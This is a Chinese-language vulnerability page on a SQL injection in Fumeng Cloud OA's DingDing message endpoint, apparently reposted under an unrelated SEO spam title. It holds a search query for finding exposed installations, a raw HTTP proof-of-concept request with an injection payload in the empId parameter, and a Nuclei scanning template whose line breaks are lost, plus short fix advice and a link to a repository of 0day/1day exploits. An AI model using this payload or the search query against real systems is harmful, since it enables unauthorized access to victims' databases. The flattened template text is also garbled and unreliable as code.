网站建设备案需要什么百度关键词价格排行榜

》》》产品描述《《《

        孚盟与阿里强强联手将最受青睐的经典C系列产品打造成全新的孚盟云产品，让用户可以用云模式实现信息化管理，让用户的异地办公更加流畅，大大降低中小企业在信息化上成本，用最小的投入享受大型企业级别的信息化服务，使中小企业在网络硬件环境、内部贸易过程管理与快速通关形成一套完整解决方案。

---

》》》漏洞描述《《《

   Web程序中对于用户提交的参数未做过滤直接拼接到SQL语句中执行，导致参数中的特殊字符破坏了SQL语句原有逻辑，攻击者可以利用该漏洞执行任意SQL语句，如查询数据、下载数据、写入webshell、执行系统命令以及绕过登录限制等。

---

》》》搜索语句《《《

body="hidLicResult" && body="hidProductID"

---

》》》漏洞复现《《《

POC

POST /m/Dingding/Ajax/AjaxSendDingdingMessage.ashx HTTP/1.1
Host: 
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
X-Requested-With: XMLHttpRequest
Content-Length: 51action=SendDingMeg_Mail&empId=2'+and+1=@@VERSION--+

yaml

id: 孚盟云oa AjaxSendDingdingMessage sql注入漏洞info:name: Potential SQL Injection in Dingding Message Endpointauthor: Kelichenseverity: highdescription: |Potential SQL Injection vulnerability in the Dingding Message Endpoint.This template attempts to exploit the vulnerability by injecting a SQL payload.reference:- http:- raw:- |POST /m/Dingding/Ajax/AjaxSendDingdingMessage.ashx HTTP/1.1Host: {{Hostname}}Accept-Encoding: gzip, deflate, brAccept-Language: zh-CN,zh;q=0.9Connection: closeContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15X-Requested-With: XMLHttpRequestContent-Length: 51action=SendDingMeg_Mail&empId=2'+and+1=@@VERSION--+matchers-condition: andmatchers:- type: statusstatus:- 200- type: wordwords:- "Microsoft SQL Server"- "MySQL"- "PostgreSQL"- "Oracle"part: body

---

》》》修复建议《《《

如非必要，禁止公网访问该系统

通过防火墙等安全设备设置访问策略，设置白名单访问。

升级产品到最新版本

---

-------------------------------------------------------------------------------------------------------------------------

-------------------------------------------------------------------------------------------------------------------------

更多最新0day/1day POC&EXP移步----->Kelichen1113/POC-EXP (github.com)

--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------